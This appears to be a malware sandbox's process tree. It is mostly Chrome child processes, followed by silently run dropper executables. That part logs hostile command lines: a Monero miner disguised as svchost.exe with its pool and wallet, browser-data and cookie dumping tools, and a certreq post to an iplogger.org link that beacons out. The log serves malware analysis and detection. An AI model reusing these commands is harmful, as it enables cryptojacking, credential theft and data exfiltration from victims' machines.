        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
        20⤵
        
        PID:5144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:8
        20⤵
        
        PID:6040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
        20⤵
        
        PID:3344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
        20⤵
        
        PID:3340
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
        20⤵
        
        PID:4092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
        20⤵
        
        PID:5324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
        20⤵
        
        PID:4328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
        20⤵
        
        PID:2792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:8
        20⤵
        
        PID:5400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4776 /prefetch:8
        20⤵
        
        PID:5952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4376 /prefetch:8
        20⤵
        
        PID:4908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 /prefetch:8
        20⤵
        
        PID:4844
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        20⤵
        
        PID:7060
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x230,0x248,0x7ff62a0f7740,0x7ff62a0f7750,0x7ff62a0f7760
        21⤵
        
        PID:7088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3576 /prefetch:8
        20⤵
        
        PID:7072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:8
        20⤵
        
        PID:7164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4952 /prefetch:8
        20⤵
        
        PID:2340
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:8
        20⤵
        
        PID:5572
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3984 /prefetch:8
        20⤵
        
        PID:6188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3968 /prefetch:8
        20⤵
        
        PID:5284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3900 /prefetch:8
        20⤵
        
        PID:6328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3512 /prefetch:8
        20⤵
        
        PID:4196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:8
        20⤵
        
        PID:2820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
        20⤵
        
        PID:6324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1716 /prefetch:8
        20⤵
        
        PID:6360
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
        20⤵
        
        PID:4496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3236 /prefetch:8
        20⤵
        
        PID:6432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
        20⤵
        
        PID:5408
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
        20⤵
        
        PID:6020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:8
        20⤵
        
        PID:4936
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
        20⤵
        
        PID:5116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:8
        20⤵
        
        PID:5400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
        20⤵
        
        PID:4692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=172 /prefetch:8
        20⤵
        
        PID:6616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4100 /prefetch:8
        20⤵
        
        PID:6588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:8
        20⤵
        
        PID:5988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:8
        20⤵
        
        PID:6544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:8
        20⤵
        
        PID:6068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
        20⤵
        
        PID:4696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:8
        20⤵
        
        PID:3344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8
        20⤵
        
        PID:5108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2020 /prefetch:8
        20⤵
        
        PID:4312
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2364 /prefetch:8
        20⤵
        
        PID:2732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:8
        20⤵
        
        PID:6672
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
        20⤵
        
        PID:3784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6052 /prefetch:8
        20⤵
        
        PID:6916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
        20⤵
        
        PID:5816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:8
        20⤵
        
        PID:4656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3776 /prefetch:8
        20⤵
        
        PID:7112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3208 /prefetch:8
        20⤵
        
        PID:6284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8
        20⤵
        
        PID:5788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:8
        20⤵
        
        PID:5992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
        20⤵
        
        PID:4796
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3708 /prefetch:8
        20⤵
        
        PID:3428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:8
        20⤵
        
        PID:6400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
        20⤵
        
        PID:4328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=6044 /prefetch:2
        20⤵
        
        PID:5612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
        20⤵
        
        PID:8152
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        16⤵
        Runs .reg file with regedit
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b firefox
        16⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b chrome
        16⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b edge
        16⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\DataFinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\DataFinder.exe" /Verysilent
        12⤵
        
        PID:5260
        
        C:\Users\Admin\Services.exe
        
        "C:\Users\Admin\Services.exe"
        13⤵
        
        PID:188
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth
        14⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\Delta.exe" /Verysilent
        12⤵
        
        PID:6876
        
        C:\Users\Admin\AppData\Local\Temp\is-E1DVI.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E1DVI.tmp\Delta.tmp" /SL5="$A03AA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\Delta.exe" /Verysilent
        13⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\is-RHPRF.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RHPRF.tmp\Setup.exe" /VERYSILENT
        14⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 956
        15⤵
        Program crash
        
        PID:3160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1036
        15⤵
        Program crash
        
        PID:6752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1060
        15⤵
        Program crash
        
        PID:5724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1040
        15⤵
        Program crash
        
        PID:6808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1160
        15⤵
        Program crash
        
        PID:6020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1312
        15⤵
        Program crash
        
        PID:5236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1384
        15⤵
        Program crash
        
        PID:6648
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1568
        15⤵
        Program crash
        
        PID:6804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 1544
        15⤵
        Program crash
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\zznote.exe" /Verysilent
        12⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\is-LBPEA.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LBPEA.tmp\zznote.tmp" /SL5="$603F6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\zznote.exe" /Verysilent
        13⤵
        
        PID:7044
        
        C:\Users\Admin\AppData\Local\Temp\is-CU9CJ.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CU9CJ.tmp\jg4_4jaa.exe" /silent
        14⤵
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\hjjgaa.exe" /Verysilent
        12⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\bpw3z5lvp5h\ynduwnd4pwp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bpw3z5lvp5h\ynduwnd4pwp.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:4424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 656
        9⤵
        Drops file in Windows directory
        Program crash
        
        PID:5016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 668
        9⤵
        Program crash
        
        PID:5096
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 816
        9⤵
        Program crash
        
        PID:5080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 812
        9⤵
        Program crash
        
        PID:5212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 880
        9⤵
        Program crash
        
        PID:5420
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 844
        9⤵
        Program crash
        
        PID:5560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1184
        9⤵
        Program crash
        
        PID:6076
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1196
        9⤵
        Program crash
        
        PID:6140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1296
        9⤵
        Program crash
        
        PID:5224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1276
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\pkd5uzxj5hj\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pkd5uzxj5hj\chashepro3.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\is-OOMT8.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OOMT8.tmp\chashepro3.tmp" /SL5="$102E2,1446038,58368,C:\Users\Admin\AppData\Local\Temp\pkd5uzxj5hj\chashepro3.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4548
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:4836
